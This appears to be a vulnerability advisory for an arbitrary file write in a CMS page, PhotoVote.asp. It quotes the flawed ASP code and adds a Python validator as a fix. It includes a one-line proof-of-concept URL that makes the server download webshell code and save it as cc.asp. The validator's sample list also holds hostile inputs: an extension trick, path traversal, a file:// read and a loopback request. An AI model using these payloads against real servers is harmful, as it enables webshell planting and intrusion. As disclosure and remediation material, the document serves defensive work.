### Summary:

The submitted parameters are never validated, so an attacker can write an arbitrary file onto the server.

### Details:

Wap/Plus/PhotoVote.asp, lines 14 - 23:

```
Dim KS:Set KS=New PublicCls
Dim ID:ID = Replace(KS.S("ID")," ","")
Dim ChannelID:ChannelID=KS.G("ChannelID")
If ChannelID="" Then ChannelID=2
' Both values come straight from the query string; the only check is "not empty"
If KS.G("LocalFileName")<>"" And KS.G("RemoteFileUrl")<>"" Then
    If KS.SaveBeyondFile(KS.G("LocalFileName"),KS.G("RemoteFileUrl"))= True Then
        Response.write KS.G("LocalFileName") ' error message
    End If
End If

' ... code omitted ...

'==================================================
' Procedure: SaveBeyondFile
' Purpose:   save a remote file to the local disk
' Param:     LocalFileName ------ local file name
' Param:     RemoteFileUrl ------ remote file URL
'==================================================
Function SaveBeyondFile(LocalFileName,RemoteFileUrl)
    On Error Resume Next
    SaveBeyondFile=True
    dim Ads,Retrieval,GetRemoteData
    Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
    With Retrieval
        ' The server itself fetches whatever URL the caller supplied
        .Open "Get", RemoteFileUrl, False, "", ""
        .Send
        If .Readystate<>4 then
            SaveBeyondFile=False
            Exit Function
        End If
        GetRemoteData = .ResponseBody
    End With
    Set Retrieval = Nothing
    Set Ads = Server.CreateObject("Adodb.Stream")
    With Ads
        .Type = 1
        .Open
        .Write GetRemoteData
        ' The raw response body is saved under the caller-supplied name, resolved by Server.MapPath
        .SaveToFile server.MapPath(LocalFileName),2
        .Cancel()
        .Close()
    End With
    If Err.Number<>0 Then
        Err.Clear
        SaveBeyondFile=False
        Exit Function
    End If
    Set Ads=nothing
End Function
```

The critical lines in the code above are:

```
If KS.G("LocalFileName")<>"" And KS.G("RemoteFileUrl")<>"" Then
    If KS.SaveBeyondFile(KS.G("LocalFileName"),KS.G("RemoteFileUrl"))= True Then
        Response.write KS.G("LocalFileName") ' error message
    End If
End If
```

`KS.G("LocalFileName")` and `KS.G("RemoteFileUrl")` are only checked for being non-empty and run through some SQL-character filtering, and then the file is written. Nothing restricts the file extension, the target path or the URL scheme: `SaveBeyondFile` downloads whatever `RemoteFileUrl` points to with `Microsoft.XMLHTTP` and saves the raw bytes to `Server.MapPath(LocalFileName)` through `Adodb.Stream`. Because `Server.MapPath` resolves a bare file name relative to the directory of the running script, the file lands in Wap/Plus. Two side effects are worth checking when verifying a fix: the download is performed by the server, so the same parameter also lets a caller make the server request URLs of their choosing, and `On Error Resume Next` swallows every failure except for the `False` return value.

### Proof of Concept:

After logging in, visit:

http://www.t00ls.net/Wap/Plus/PhotoVote.asp?LocalFileName=cc.asp&RemoteFileUrl=http://www.bksec.net/1.txt

On success, cc.asp is written under Wap/Plus and the file name is echoed back; 1.txt contains the webshell code.
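The checks the handler above is missing, written up as an added example (not Kesion's code and not a drop-in for the ASP page; it models the validation in Python so it can be run against sample input). The upload directory `Wap/Plus/Upload`, the image-only extension whitelist and the sample request pairs are assumptions constructed for this example; only the `cc.asp` / `1.txt` pair comes from the report.

```python
from __future__ import annotations

import ipaddress
import posixpath
from urllib.parse import urlsplit

# Policy assumed for this example (not taken from the CMS): one writable directory
# and an image-only extension whitelist, since a photo-vote page has no reason
# to save .asp files.
ALLOWED_DIR = "Wap/Plus/Upload"
ALLOWED_EXT = {".jpg", ".jpeg", ".gif", ".png"}


def check_local_filename(name: str) -> tuple[bool, str]:
    """Return (ok, target_path_or_reason) for a caller-supplied LocalFileName.

    The vulnerable handler passes the raw name to Server.MapPath, so anything
    that is not a plain image file name inside ALLOWED_DIR is refused here.
    """
    if not name or name != name.strip():
        return False, "empty or padded name"
    if "\x00" in name:
        return False, "NUL byte in name"
    if "/" in name or "\\" in name or ":" in name:
        return False, "path separators or drive letters are not allowed"
    base, ext = posixpath.splitext(name)
    if ext.lower() not in ALLOWED_EXT:
        return False, f"extension {ext!r} is not an image extension"
    if "." in base or ";" in base:
        # Rejects cc.asp.jpg and the old IIS 6 style cc.asp;.jpg, which that
        # server could execute as ASP despite the trailing image extension.
        return False, "multiple extensions are not allowed"
    return True, posixpath.join(ALLOWED_DIR, name)


def check_remote_url(url: str) -> tuple[bool, str]:
    """Return (ok, url_or_reason) for a caller-supplied RemoteFileUrl.

    The server performs the fetch, so besides the scheme this also blocks
    literal loopback/private/link-local targets. A DNS name still needs a
    resolve-then-check step before connecting in real code.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} is not allowed"
    if not parts.hostname:
        return False, "URL has no host"
    if parts.username or parts.password:
        return False, "credentials embedded in URL"
    host = parts.hostname
    if host == "localhost":
        return False, "loopback host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True, url  # a DNS name: resolve and re-check the address before fetching
    if not ip.is_global:
        return False, f"non-public address {ip}"
    return True, url


def vet_request(local_filename: str, remote_url: str) -> tuple[bool, str]:
    """Apply both checks; on success the second element is the path to write."""
    ok, result = check_local_filename(local_filename)
    if not ok:
        return False, "LocalFileName: " + result
    target = result
    ok, result = check_remote_url(remote_url)
    if not ok:
        return False, "RemoteFileUrl: " + result
    return True, target


# Constructed sample requests: the report's PoC pair plus a few variants.
SAMPLE_REQUESTS = [
    ("cc.asp", "http://www.bksec.net/1.txt"),          # the PoC from the report
    ("cc.asp;.jpg", "http://www.bksec.net/1.txt"),     # extension trick
    ("..\\..\\cc.jpg", "http://www.bksec.net/1.txt"),  # traversal attempt
    ("photo.jpg", "file:///C:/boot.ini"),              # non-HTTP scheme
    ("photo.jpg", "http://127.0.0.1/admin/"),          # server-side request to loopback
    ("photo.jpg", "http://example.com/photo.jpg"),     # the only legitimate one
]

if __name__ == "__main__":
    for local_name, url in SAMPLE_REQUESTS:
        ok, info = vet_request(local_name, url)
        print(f"{'ALLOW' if ok else 'DENY '} {local_name!r} <- {url!r}: {info}")
```

Only the last sample pair is accepted; the PoC pair is refused on the extension alone, before the URL is even looked at. The same two checks translate directly into VBScript in front of the `SaveBeyondFile` call, with the resolved target path, not the raw parameter, passed to `Server.MapPath`.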